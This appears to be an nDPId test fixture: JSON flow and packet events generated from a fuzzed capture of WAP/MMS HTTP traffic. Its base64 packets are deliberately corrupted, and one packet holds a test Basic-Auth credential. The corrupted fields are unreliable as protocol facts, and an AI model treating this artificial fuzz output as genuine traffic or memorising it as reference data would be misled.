00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"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"}
00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17ACVzAJN8CABFAAXcQEtAAIAGVpasFAMFrBQDDSVzAFDlUj+tytsnNlAQInStCAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvES4xDQpIbnN0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29sdGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6INtwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLEFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCEFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdmVyc2lvbj0lcwAwIj8+PHpkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YSVzAHMjInhtbG5zOnByZj0iaHR0cDovL3d3VC53YXBmb291bS5vcmcvVUFQbk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb34gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhZz48cmRmOmxpPmFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkRzpCYWc+PC9wcmY6Q2NwcEFjY2VwdD5XL3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYtMjogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgcG18bnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbLVzOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMDQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT58ckhmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdC1DaGFyc2V0PjxyZGY6QmFnPjxyZGY6bGk+KjwvcmRmOmxpPjwvcmRmOkJhZz48L3ByZjpDY3BwQWNjZXB0LUNoYXJzZXQ+PC9yZGY6RGVzY3JpcHRpb24+PC9yZGY6UkRGPg0KNTYtUHJvZmlsZS1EaWZmLTM6IDw\/eG1sIHZlcnNpb249IjEuMCI\/PjxyZGY6UkRGIHhtbG5zOnJkZj1MaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyJ4bWxuczpwcmY9Imh0dHA6L9x3d3cud2FwZm9CdW0ub3JnL1VBUFJPRi9jY3Bwc2NoZW1hLTE5OTkxMDE0IyI+PCEtLSBicm93c2VyIHZlbmRvciBzaXRlOiBEZWZhdWx0IGRlc2NyaXB0aW9uIG9mIHByb3BlcnRpZXMxLS0+PHJkZk5EZXNjcmlwdGlvbj48cHJmOkNjcHBB9mNlcHQtTGFuZ3VhZ2U+PHJkZjpTZXE+PHJkZjpsaT5lbjwvcmRiOmxpPjwvcmRmOlNlcT48L3ByZjpDY3BwQWNjZXB0LUxhbmd1YWdlPjwvcmRmOkRlc2NyaXB0OG9uPjwvcmRmOlJERj4NCjU2LVByb2ZpbGUJICJodHRwOi8vd2FwLnNvbnllcmljc3Nvbm1vYmlsZS5jb20vVUFwcm9mL1Q2OFI="}
00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"thread_ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854562488,"pkt":"AHWLk5N8CAAgsl17CABFAAAwxNVAAEAGF7isFAMNrBQDBc\/JAFDK5CpLAAAAAHACgyzcpwAAAQEEAgIEBbQ="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562488,"pkt":"CAAgsl17AFCLk5N8CABFAAAsQ0tAAIAGWUasFAMFrBQjDQBQz5DlU6AgyuQqTGASIjjNHQAAAgQFtG4v"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"}
00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"thread_ts_msec":1031854562489,"pkt":"AFCLk5N8CAAgsl17CABFAANIxNhAAEAGFJ2sFAMNrEYDBc+QAFDK5CuI5VOgYVAYgyy9cwAALS1tc2dwYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0DQpDb250s250LVR5cGU6IGFwcGxpY2F0em9uk3htbA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz4NCjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIg0KICAgICAgICAgNmh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cCBwPg0KICA8cHVzaC1tZXNzYWdlIHB1dmgtaWQ9IjE4OTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5lWSIgZGVsaXZlci1iZWZvcmUtdGltZXN0YW1wPSIyMDAyLTA5LTEyVDE5OjE0OjQ4SiIgcHBnLW5vdGlmeS1yZXF1ZXN0ZWQtdG89Imh0dHA6Ly8xNzIuMjAuMy4xMytzZXJ2bGV0cy9tbXMiPg0KICAgITxhZGRyZXNzIGFkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcwNjEwMTAwNC9UWVBFPVBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KIDIgIDxxdWFsaXR5LW9mLXNlcnZpY2UgcHJpb3JpdHk9Im1lZGl1bSIgZGVsaXZlcnktbWV0aG9kPSJ1bmNvbmZpcm1lZCI+PC9xdWFsaXR5LW9mLSVzAHZpY2U+DQogIDwvdnVzaC1tZXNzYWdlPg0KPC9wYXA+DQoNCi0tbXNncGFydF8wXzEwWDhfMTAzMTg1NDU2MjQ4NA0KQ29udGVudC1UeXBlOiBjcHBsaVdhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpYLWphcC1BcHBsaWNhdGlvbi1JZDogNA0KDR+Mho2QizE4OTMwMEBnZWNkczIubW9iaWxpdHlsYWIubmV0AJcrNDkxNzI2MTAxMDA0L1RZUEU9UExNTleFBD2A2eKVgQ0KLS1tc2dnYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0LS0="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562690,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562690,"pkt":"AFCLk5N8CAAgsl17CABFAAAobNpAAEAGF7usFEMNrBQDBc+QAFDK5C6o5VOhNFAQgyx+pAAA"}
00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1031854565447}
00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854562790,"pkt":"CAAgsl17AFCLk5N8DABFJXMATUtAAIAGT0asFAMFrBQDDQowAFDlXnSjAABhAGACIAC1aQAAAgQFtCiq"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565447,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854565447,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"}
